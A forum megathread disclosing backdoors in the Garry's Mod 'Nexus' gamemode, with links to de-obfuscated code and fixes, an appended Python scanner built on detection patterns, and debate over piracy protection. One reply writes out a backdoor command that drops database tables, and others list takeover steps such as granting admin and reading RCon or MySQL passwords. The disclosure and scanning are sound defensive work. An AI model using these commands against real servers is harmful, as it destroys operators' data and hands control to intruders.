Nexus Exploits Megathread
    121 replies, posted
This is a thread to point out all of the exploits in Nexus and their fixes. Major thanks to Polly for de-obfuscating all of this stuff because I'm lazy. There are most likely more backdoors/exploits, but these will be searched for tomorrow.

[b]Nexus 3.1a[/b]
[list]
[*]Exploit(s)
[list]
[*]Serverside Runtime Code
[list]
[*]File(s)
[list]
[*]lua/includes/modules/json.lua
[*]Nexus/gamemode/mounts/pickupobjects/sv_auto.lua
[/list]
[*]Ciphertext
[list]
[*][url]http://codepad.org/rBfnjI3j[/url]
[/list]
[*]Plaintext
[list]
[*][url]http://codepad.org/PgmWhLBL[/url]
[/list]
[*]Fixed
[list]
[*][url]http://codepad.org/BomDZ95d[/url]
[/list]
[*]Info
[list]
[*]Disables a server if not found on the whitelist at [url]http://kurozael.com/whitelist.txt[/url].
[list]
[*]Sets the password to 'kurozael' and hostname to 'SPEAK TO [email]KUROZAEL@GMAIL.COM[/email] TO AUTHORISATION.'.
[/list]
[/list]
[/list]
[/list]
[/list]

[b]Nexus 3.0e[/b]
[list]
[*]Exploit(s)
[list]
[*]Commands
[list]
[*]File(s)
[list]
[*]Nexus/gamemode/mounts/pickupobjects/entities/entities/nx_grab/sh_auto.lua
[/list]
[*]Ciphertext
[list]
[*][url]http://codepad.org/IEbCKuur[/url]
[/list]
[*]Plaintext
[list]
[*][url]http://codepad.org/QIJEkdXy[/url]
[/list]
[*]Fixed
[list]
[*][url]http://codepad.org/GXK7XWY7[/url]
[/list]
[*]Info
[list]
[*]Allows a player to run the command 'basic lua'
[list]
[*]A call to _G[ "RunString" ]
[/list]
[*]Allows a player to run the command 'basic comm'
[list]
[*]A call to game.ConsoleCommand
[/list]
[/list]
[/list]
[/list]
[/list]

Brought to you by Polly ( raBBish ) and Helix ( Helix Alioth ).
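As an added example (not code from the thread, from Nexus, or from its author), a small Python scanner that flags the shapes the post names in a gamemode's Lua files: a code loader reached through _G, direct RunString/CompileString calls, game.ConsoleCommand issued from script, remote fetches that could serve as a whitelist kill switch, and string.char byte lists. The sample files, rule labels and the example.invalid URL are constructed here; hits are line numbers to review by hand, not proof of a backdoor.

```python
import os
import re

# Constructed sample inputs (not Nexus's actual code): a benign file and one using the
# shapes the post names (_G lookup of RunString, chat command -> game.ConsoleCommand, remote fetch).
SAMPLE_FILES = {
    "sh_clean.lua": 'function GM:PlayerSay(ply, text) return text end\n',
    "sh_auto.lua": (
        'local f = _G[ "RunString" ]\n'
        'hook.Add("PlayerSay", "x", function(ply, text)\n'
        '  if string.sub(text, 1, 9) == "basic lua" then f(string.sub(text, 11)) end\n'
        '  if string.sub(text, 1, 10) == "basic comm" then game.ConsoleCommand(string.sub(text, 12)) end\n'
        'end)\n'
        'http.Fetch("http://example.invalid/whitelist.txt", function(body) end)\n'
    ),
}

# (label, regex) pairs; the labels are this example's own wording, not Nexus terms.
RULES = [
    ("code loader reached through _G", re.compile(r'_G\s*\[\s*["\'](?:RunString|RunStringEx|CompileString)["\']\s*\]')),
    ("direct runtime code execution", re.compile(r'\b(?:RunString|RunStringEx|CompileString)\s*\(')),
    ("server console command issued from script", re.compile(r'\bgame\.ConsoleCommand\s*\(')),
    ("remote fetch (possible whitelist / kill switch)", re.compile(r'\bhttp\.(?:Fetch|Post)\s*\(\s*["\']https?://')),
    ("string.char byte-list obfuscation", re.compile(r'\bstring\.char\s*\((?:\s*\d+\s*,){3,}')),
]

def scan_source(src):
    """Return [(line number, label)] for every rule that matches a line of one Lua source."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        hits.extend((lineno, label) for label, rx in RULES if rx.search(line))
    return hits

def scan_tree(files):
    """files: {path: source}. Return {path: hits} only for files with at least one hit."""
    scanned = ((path, scan_source(src)) for path, src in files.items())
    return {path: hits for path, hits in scanned if hits}

def load_tree(root):
    """Read every .lua file under root into {relative path: source} for scan_tree()."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".lua"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return files
```

On a real install run `scan_tree(load_tree("<path to the gamemode folder>"))`; the sample above is only there so the scanner runs offline.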
How do you manage to decompile/crack that code, lol
They're actually not that hard to find. I removed the one in nexus3 (the old exploit, not basic) a few weeks ago (before kuro removed it himself) and also found the backdoor in 3e and decided not to upgrade. They all use the same types of ways to hide the code. -Edit- Also the newest one is not really a backdoor, it's more piracy protection with a backdoor for those who illegitimately received the customer-only script (Nexus 3.1 was supposed to be customer only, it seems).
Kurosawa(-- lol auto corrector) kinda fails then for placing the newest backdoor a few folders behind the old one.
Kuropixel didn't count on the domain going down.
If his domain is down, doesn't that mean any customers' servers with the /whitelist.txt code are down too?
All the customer servers are up.
[QUOTE=Boilrig;22818086]All the customer servers are up.[/QUOTE] Cause Kuro hasn't given any customers Nexus 3.1 yet. Although now that his website is down, so is his own server, [url]http://www.gametracker.com/server_info/91.192.210.198:27017/[/url] I believe that sums up, epic fail.
[QUOTE=Helix Alioth;22815605]Brought to you by Polly ( raBBish ) and Helix ( Helix Alioth ).[/QUOTE] :cawg: [editline]12:38PM[/editline] Why are people trying to remove every backdoor in the script when they say it's shit?
Customer servers are down, including Kuro's server himself at the moment.
[QUOTE=deggemannen;22820716]:cawg: [editline]12:38PM[/editline] Why are people trying to remove every backdoor in the script when they say it's shit?[/QUOTE] Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.
[QUOTE=Helix Alioth;22815605]Major thanks to Polly for de-obfuscating all of this stuff because I'm lazy.[/QUOTE] Don't mind me for publishing the first one.. :v
[QUOTE=raBBish;22821197]Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.[/QUOTE] Even literal back doors? I would find it hard getting out of your house :S.
[QUOTE=sintwin;22822238]Even literal back doors? I would find it hard getting out of your house :S.[/QUOTE] We only have two front doors :v:
[QUOTE=sintwin;22822238]Even literal back doors? I would find it hard getting out of your house :S.[/QUOTE] This guy has never heard of a front door before
[QUOTE=Nemesis036;22829679]This guy has never heard of a front door before[/QUOTE] What if you have a garden then.
[QUOTE=raBBish;22821197]Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.[/QUOTE] For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).
[QUOTE=Spyfox5400;22831086]For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).[/QUOTE] I've already stated this once or twice. No, changing password and host name doesn't count as a back door. [quote=Princeton] back door: an undocumented way to get access to a computer system or the data it contains[/quote] An undocumented console command that allows you to run Lua scripts or console commands on the server? Definitely a back door. Even if it's meant to prevent piracy, it's still a back door. Is that clear now?
[QUOTE=Spyfox5400;22831086]For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).[/QUOTE] Or just use the "customer" version after removing the shit security anyway as charging for a gamemode is fucking pathetic.
[QUOTE=hexpunK;22832507]Or just use the "customer" version after removing the shit security anyway as charging for a gamemode is fucking pathetic.[/QUOTE] Yes, I agree. However just because you disagree with how something is run (as in him selling the gamemodes), does not make it ethical to use a leaked gamemode and remove his piracy protection code. Also, again I will state, yes it's a backdoor but the harm that can actually be done with that backdoor is minuscule. In all honesty it really can't do that much on a LOCKED server. Anything you do using the lua commands is placed into volatile memory and disappears on restart. In addition using console commands really only does anything for the time that the server is up. And again, they are ONLY active on servers that are using the illegitimately obtained script. I.E. not on the licensed ones. Plus what's anyone going to do with a backdoor on a passworded server? Wreak havoc on the single player that is there?
Well, if it wasn't passworded then yeah, they become a problem. But doesn't the server console have the ability to read/write files in the filesystem? I can't remember now...
Add themselves as admins, get RCon password (not sure if you can still read server.cfg) and get MySQL password for example. [editline]12:55AM[/editline] And there's bound to be back doors in the modules, and with C++ you can do pretty much anything.
As much as Kuroscript is good and how two wrongs don't make a right, if Kuro insists on adding backdoors to public versions of his code then he deserves his 'P2P' gamemode to be leaked and cracked. Respect can only be earnt, he did the opposite.
[QUOTE=Spyfox5400;22833440]Yes, I agree. However just because you disagree with how something is run (as in him selling the gamemodes), does not make it ethical to use a leaked gamemode and remove his piracy protection code. Also, again I will state, yes it's a backdoor but the harm that can actually be done with that backdoor is minuscule. In all honesty it really can't do that much on a LOCKED server. Anything you do using the lua commands is placed into volatile memory and disappears on restart. In addition using console commands really only does anything for the time that the server is up. And again, they are ONLY active on servers that are using the illegitimately obtained script. I.E. not on the licensed ones. Plus what's anyone going to do with a backdoor on a passworded server? Wreak havoc on the single player that is there?[/QUOTE] You could use the basic lua command to delete all of the mysql database. That would have a huge effect, seeing as it would delete everyone's characters and items.
Or just fuck the whole server to no end
[QUOTE=sintwin;22834964]You could use the basic lua command to delete all of the mysql database. That would have a huge effect, seeing as it would delete everyone's characters and items.[/QUOTE] We're talking about the new stuff that kuro put in, not basic. I don't dispute the fact that the things in the earlier versions were clearly exploitable backdoors. I'm merely stating that people shouldn't be able to exploit with 3.1, as once you notice it is locked and passworded, anyone with half of a brain would know to take it offline. So while it is a backdoor, it only affects those who use it illegitimately, and those not smart enough to take their server offline once they realize that it has been compromised by them using an illegitimately obtained gamemode. I do wonder if he actually also put backdoors in the .dll files, as if there really were backdoors in there, why would he bother continuously updating the lua backdoors? (Maybe he did, maybe he didn't; I really don't know, just wondering why he would bother updating the other backdoors.) Plus rabbish, even though you /can/ do all those things (I don't dispute the fact that there are some malicious things that can be done), the server operator would immediately know if you were, as the server would be both locked (and only those who know the exploits know the password) and those commands require access to the server for them to be executed. -Edit- What good does it do to give yourself admin on a locked server? lol.
Let me ask you something.. How does one remove the back door? hmmm? I really have no clue! lol what can I say... I'm Simple Jack, I try to catch butterflies with a wooden mallet. So yeah, someone help a brother out. Oh yeah, and I'm not a good read, whatsoever!
[QUOTE=Spyfox5400;22836402]We're talking about the new stuff that kuro put in, not basic. [/quote] "auth_main l sql.Query([[DROP TABLE <somename>]])" works in 3.1a [QUOTE=Spyfox5400;22836402]I don't dispute the fact that the things in the earlier versions were clearly exploitable backdoors. I'm merely stating that people shouldn't be able to exploit with 3.1, as once you notice it is locked and passworded, anyone with half of a brain would know to take it offline. So while it is a backdoor, it only affects those who use it illegitimately, and those not smart enough to take their server offline once they realize that it has been compromised by them using an illegitimately obtained gamemode.[/quote] People with more than half a brain would check here for the fixes. (No offense to the user above :v:) Anyways, I don't like people selling Lua scripts, and I don't care whether you got the gamemode legitimately or not. I doubt anyone is getting hurt if I post fixes to Kuro's back doors. Also, you can't really rely on Kuro ($300, no proper contract), he could remove a server from the white list without getting into any trouble. Legitimate customers would suffer. [QUOTE=Spyfox5400;22836402] I do wonder if he actually also put backdoors in the .dll files, as if there really were backdoors in there, why would he bother continuously updating the lua backdoors? (Maybe he did, maybe he didn't; I really don't know, just wondering why he would bother updating the other backdoors.)[/quote] If this was my gamemode I was leaking on purpose (come on, it's too obvious...) I'd put back doors in the modules, C++ gives way more power than Lua.
[QUOTE=Spyfox5400;22836402] Plus rabbish, even though you /can/ do all those things (I don't dispute the fact that there are some malicious things that can be done), the server operator would immediately know if you were, as the server would be both locked (and only those who know the exploits know the password) and those commands require access to the server for them to be executed. [/quote] This is true, but considering 50% of GMod servers are run by idiots (I know, understatement :v:), there's plenty of servers where you could do this stuff without being noticed. [QUOTE=Spyfox5400;22836402] -Edit- What good does it do to give yourself admin on a locked server? lol.[/QUOTE] Only people with less than half a brain would re-install their server if someone sets the password. In most cases users.txt or whatever admin mod they use will stay untouched when the server opens again. So you'd still have admin rights when it's open again.
How do you get this RP? Or.. you can't? I really never check for gamemodes and only used DarkRP.
[QUOTE=raBBish;22837019]"auth_main l sql.Query([[DROP TABLE <somename>]])" works in 3.1a People with more than half a brain would check here for the fixes. (No offense to the user above :v:) Anyways, I don't like people selling Lua scripts, and I don't care whether you got the gamemode legitimately or not. I doubt anyone is getting hurt if I post fixes to Kuro's back doors. Also, you can't really rely on Kuro ($300, no proper contract), he could remove a server from the white list without getting into any trouble. Legitimate customers would suffer. If this was my gamemode I was leaking on purpose (come on, it's too obvious...) I'd put back doors in the modules, C++ gives way more power than Lua. This is true, but considering 50% of GMod servers are run by idiots (I know, understatement :v:), there's plenty of servers where you could do this stuff without being noticed. Only people with less than half a brain would re-install their server if someone sets the password. In most cases users.txt or whatever admin mod they use will stay untouched when the server opens again. So you'd still have admin rights when it's open again.[/QUOTE] Lol, this is such a silly argument (on both of our parts). Ehh... I was really just trying to point out that you'd have to be pretty stupid not to stop using that gamemode (or at least shut down your server, which would render the backdoor useless) when you find that it locks your server. But of course, like you said, a lot of the people that run gmod servers do have half a brain.